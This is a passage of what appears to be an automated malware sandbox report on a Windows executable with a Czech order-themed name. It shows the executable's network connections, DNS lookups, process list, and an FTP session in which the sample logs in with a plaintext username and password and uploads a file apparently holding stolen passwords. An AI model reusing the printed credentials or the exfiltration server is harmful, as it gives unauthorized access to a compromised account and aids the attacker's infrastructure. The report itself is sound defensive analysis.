Dec 2, 2024 11:36:20.106118917 CET | 49738 | 35334 | 192.168.2.4 | 86.107.36.93 |
Dec 2, 2024 11:36:20.106118917 CET | 49738 | 35334 | 192.168.2.4 | 86.107.36.93 |
Dec 2, 2024 11:36:20.155169964 CET | 49737 | 21 | 192.168.2.4 | 86.107.36.93 |
Dec 2, 2024 11:36:20.226174116 CET | 35334 | 49738 | 86.107.36.93 | 192.168.2.4 |
Dec 2, 2024 11:36:20.226537943 CET | 35334 | 49738 | 86.107.36.93 | 192.168.2.4 |
Dec 2, 2024 11:36:20.226619959 CET | 49738 | 35334 | 192.168.2.4 | 86.107.36.93 |
Dec 2, 2024 11:36:20.535051107 CET | 21 | 49737 | 86.107.36.93 | 192.168.2.4 |
Dec 2, 2024 11:36:20.577001095 CET | 49737 | 21 | 192.168.2.4 | 86.107.36.93 |
Dec 2, 2024 11:37:17.040368080 CET | 80 | 49736 | 185.33.55.26 | 192.168.2.4 |
Dec 2, 2024 11:37:17.040452003 CET | 49736 | 80 | 192.168.2.4 | 185.33.55.26 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Dec 2, 2024 11:36:09.850991964 CET | 59221 | 53 | 192.168.2.4 | 1.1.1.1 |
Dec 2, 2024 11:36:10.418071985 CET | 53 | 59221 | 1.1.1.1 | 192.168.2.4 |
Dec 2, 2024 11:36:13.888487101 CET | 54795 | 53 | 192.168.2.4 | 1.1.1.1 |
Dec 2, 2024 11:36:14.615451097 CET | 53 | 54795 | 1.1.1.1 | 192.168.2.4 |
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|
Dec 2, 2024 11:36:09.850991964 CET | 192.168.2.4 | 1.1.1.1 | 0x53d5 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Dec 2, 2024 11:36:13.888487101 CET | 192.168.2.4 | 1.1.1.1 | 0xc885 | Standard query (0) | A (IP address) | IN (0x0001) | false |
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|---|---|
Dec 2, 2024 11:36:10.418071985 CET | 1.1.1.1 | 192.168.2.4 | 0x53d5 | No error (0) | 185.33.55.26 | A (IP address) | IN (0x0001) | false | ||
Dec 2, 2024 11:36:14.615451097 CET | 1.1.1.1 | 192.168.2.4 | 0xc885 | No error (0) | 86.107.36.93 | A (IP address) | IN (0x0001) | false |
|
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
0 | 192.168.2.4 | 49736 | 185.33.55.26 | 80 | 7856 | \Device\CdRom1\Objedn vka_20248481119000903.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Dec 2, 2024 11:36:10.543442011 CET | 206 | OUT | |
Dec 2, 2024 11:36:11.831723928 CET | 1236 | IN | |
Dec 2, 2024 11:36:11.831749916 CET | 1236 | IN | |
Dec 2, 2024 11:36:11.831760883 CET | 712 | IN | |
Dec 2, 2024 11:36:11.831842899 CET | 1236 | IN | |
Dec 2, 2024 11:36:11.831887960 CET | 1236 | IN | |
Dec 2, 2024 11:36:11.831902027 CET | 1236 | IN | |
Dec 2, 2024 11:36:11.831912041 CET | 1236 | IN | |
Dec 2, 2024 11:36:11.832129002 CET | 1236 | IN | |
Dec 2, 2024 11:36:11.832139969 CET | 1236 | IN | |
Dec 2, 2024 11:36:11.832149982 CET | 1236 | IN | |
Dec 2, 2024 11:36:11.951905966 CET | 1236 | IN |
Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands |
---|---|---|---|---|---|
Dec 2, 2024 11:36:15.976186037 CET | 21 | 49737 | 86.107.36.93 | 192.168.2.4 | 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 13 of 80 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 13 of 80 allowed.220-Local time is now 11:36. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 13 of 80 allowed.220-Local time is now 11:36. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 13 of 80 allowed.220-Local time is now 11:36. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 13 of 80 allowed.220-Local time is now 11:36. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity. |
Dec 2, 2024 11:36:15.976421118 CET | 49737 | 21 | 192.168.2.4 | 86.107.36.93 | USER server@carbognin.it |
Dec 2, 2024 11:36:16.401093960 CET | 21 | 49737 | 86.107.36.93 | 192.168.2.4 | 331 User server@carbognin.it OK. Password required |
Dec 2, 2024 11:36:16.401365995 CET | 49737 | 21 | 192.168.2.4 | 86.107.36.93 | PASS 59Cif8wZUH#X |
Dec 2, 2024 11:36:16.883939981 CET | 21 | 49737 | 86.107.36.93 | 192.168.2.4 | 230 OK. Current restricted directory is / |
Dec 2, 2024 11:36:17.314496040 CET | 21 | 49737 | 86.107.36.93 | 192.168.2.4 | 504 Unknown command |
Dec 2, 2024 11:36:17.314687967 CET | 49737 | 21 | 192.168.2.4 | 86.107.36.93 | PWD |
Dec 2, 2024 11:36:17.739521027 CET | 21 | 49737 | 86.107.36.93 | 192.168.2.4 | 257 "/" is your current location |
Dec 2, 2024 11:36:17.739729881 CET | 49737 | 21 | 192.168.2.4 | 86.107.36.93 | TYPE I |
Dec 2, 2024 11:36:18.172656059 CET | 21 | 49737 | 86.107.36.93 | 192.168.2.4 | 200 TYPE is now 8-bit binary |
Dec 2, 2024 11:36:18.172842026 CET | 49737 | 21 | 192.168.2.4 | 86.107.36.93 | PASV |
Dec 2, 2024 11:36:18.483267069 CET | 49737 | 21 | 192.168.2.4 | 86.107.36.93 | PASV |
Dec 2, 2024 11:36:18.840609074 CET | 21 | 49737 | 86.107.36.93 | 192.168.2.4 | 227 Entering Passive Mode (86,107,36,93,138,6) |
Dec 2, 2024 11:36:18.961505890 CET | 49737 | 21 | 192.168.2.4 | 86.107.36.93 | STOR PW_user-116938_2024_12_02_05_36_12.html |
Dec 2, 2024 11:36:20.105631113 CET | 21 | 49737 | 86.107.36.93 | 192.168.2.4 | 150 Accepted data connection |
Dec 2, 2024 11:36:20.535051107 CET | 21 | 49737 | 86.107.36.93 | 192.168.2.4 | 226-File successfully transferred 226-File successfully transferred226 0.429 seconds (measured here), 0.73 Kbytes per second |
Click to jump to process
Click to jump to process
back
Click to dive into process behavior distribution
Click to jump to process
Target ID: | 0 |
Start time: | 05:35:22 |
Start date: | 02/12/2024 |
Path: | C:\Windows\SysWOW64\cmd.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x240000 |
File size: | 236'544 bytes |
MD5 hash: | D0FCE3AFA6AA1D58CE9FA336CC2B675B |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 1 |
Start time: | 05:35:22 |
Start date: | 02/12/2024 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7699e0000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 2 |
Start time: | 05:35:22 |
Start date: | 02/12/2024 |
Path: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0xe90000 |
File size: | 433'152 bytes |
MD5 hash: | C32CA4ACFCC635EC1EA6ED8A34DF5FAC |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 5 |
Start time: | 05:35:26 |
Start date: | 02/12/2024 |
Path: | \Device\CdRom1\Objedn vka_20248481119000903.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x400000 |
File size: | 1'009'888 bytes |
MD5 hash: | FFC86DFE93F81BCE26A2B4D2D818B167 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Yara matches: |
|
Reputation: | low |
Has exited: | true |
Target ID: | 9 |
Start time: | 05:35:57 |
Start date: | 02/12/2024 |
Path: | \Device\CdRom1\Objedn vka_20248481119000903.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x400000 |
File size: | 1'009'888 bytes |
MD5 hash: | FFC86DFE93F81BCE26A2B4D2D818B167 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Yara matches: |
|
Reputation: | low |
Has exited: | false |